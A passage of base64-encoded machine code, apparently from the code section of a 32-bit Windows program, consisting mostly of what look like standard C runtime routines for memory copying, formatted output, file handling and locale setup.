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 